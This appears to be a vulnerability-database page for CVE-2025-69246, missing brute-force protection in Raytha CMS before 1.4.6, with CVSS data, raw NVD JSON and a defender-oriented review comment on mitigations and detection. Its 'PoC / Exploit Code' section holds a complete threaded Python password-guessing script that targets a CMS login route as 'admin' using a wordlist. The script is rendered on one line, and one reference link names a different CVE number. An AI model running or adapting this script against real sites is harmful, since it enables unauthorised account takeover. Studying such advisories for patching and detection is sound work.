Security Vulnerability Report
CVE-2025-69246 CVSS 9.8 CRITICAL

CVE-2025-69246

Published: 2026-03-16 14:18:02
Last Modified: 2026-03-16 19:21:32

Description

Raytha CMS does not implement any brute-force protection mechanism. It allows an attacker to send multiple automated logon requests without triggering lockout, throttling, or step-up challenges. This issue was fixed in version 1.4.6.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:raytha:raytha:*:*:*:*:*:*:*:* - VULNERABLE
Raytha CMS < 1.4.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# NOTE(review): CVE-2025-69246 (CWE-307, per the raw JSON below). The script on the
# next line only demonstrates the absence of lockout/throttling on the Raytha CMS
# login route (/auth/login in the script's TARGET_URL) by issuing repeated POSTs
# from a thread pool until one is treated as a successful login. As rendered on
# this page it is collapsed onto a single line and is not valid Python; it is
# reproduced byte-for-byte and deliberately not reformatted here.
# Defender view: the vendor fix is server-side (advisory: fixed in 1.4.6).
# Compensating controls for unpatched deployments are the ones the description
# names as missing -- account lockout or progressive delay after N failures,
# per-IP/per-account rate limiting at the reverse proxy or WAF, and a step-up
# challenge on the login form. Detection signal: a burst of POST requests to the
# login route carrying one fixed "email" value with many failed attempts from a
# single source in a short window (the script sends them concurrently, so the
# burst is tight).
#!/usr/bin/env python3 """ CVE-2025-69246 PoC - Raytha CMS Brute Force Login This PoC demonstrates the lack of brute force protection in Raytha CMS. Use only for authorized security testing. """ import requests import sys from concurrent.futures import ThreadPoolExecutor, as_completed TARGET_URL = "https://target-site.com/auth/login" # Replace with target URL USERNAME = "admin" # Target username PASSWORD_FILE = "passwords.txt" # Wordlist file MAX_THREADS = 10 def try_login(password): """Attempt login with given password""" data = { "email": USERNAME, "password": password.strip(), "return_url": "/" } try: response = requests.post(TARGET_URL, data=data, timeout=10, allow_redirects=False) # Successful login typically returns redirect or specific status if response.status_code in [200, 302] and "login" not in response.headers.get("Location", ""): return password.strip(), True except requests.RequestException: pass return password.strip(), False def main(): print(f"[*] CVE-2025-69246 PoC - Raytha CMS Brute Force") print(f"[*] Target: {TARGET_URL}") print(f"[*] Username: {USERNAME}") try: with open(PASSWORD_FILE, 'r') as f: passwords = f.readlines() except FileNotFoundError: print(f"[!] Password file not found: {PASSWORD_FILE}") sys.exit(1) print(f"[*] Loaded {len(passwords)} passwords, starting attack...") with ThreadPoolExecutor(max_workers=MAX_THREADS) as executor: futures = {executor.submit(try_login, pwd): pwd for pwd in passwords} for future in as_completed(futures): pwd, success = future.result() if success: print(f"\n[!] VALID PASSWORD FOUND: {pwd}") print("[*] Attack completed successfully") sys.exit(0) else: print(f"[*] Tried: {pwd}", end='\r') print("\n[!] No valid password found") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69246", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:18:02.093", "lastModified": "2026-03-16T19:21:32.470", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Raytha CMS does not have any brute force protection mechanism implemented. It allows an attacker to send multiple automated logon requests without triggering lockout, throttling, or step-up challenges.\n\nThis issue was fixed in version 1.4.6."}, {"lang": "es", "value": "Raytha CMS no tiene ningún mecanismo de protección contra fuerza bruta implementado. Permite a un atacante enviar múltiples solicitudes de inicio de sesión automatizadas sin activar el bloqueo de cuenta, la limitación de velocidad o los desafíos de autenticación escalonada.\n\nEste problema fue solucionado en la versión 1.4.6."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": 
"NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-307"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:raytha:raytha:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.4.6", "matchCriteriaId": "4A4FC7D6-F33F-4121-A375-B063263585FD"}]}]}], "references": [{"url": "https://cert.pl/en/posts/2026/03/CVE-2025-69236", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://raytha.com", "source": "[email protected]", "tags": ["Product"]}]}}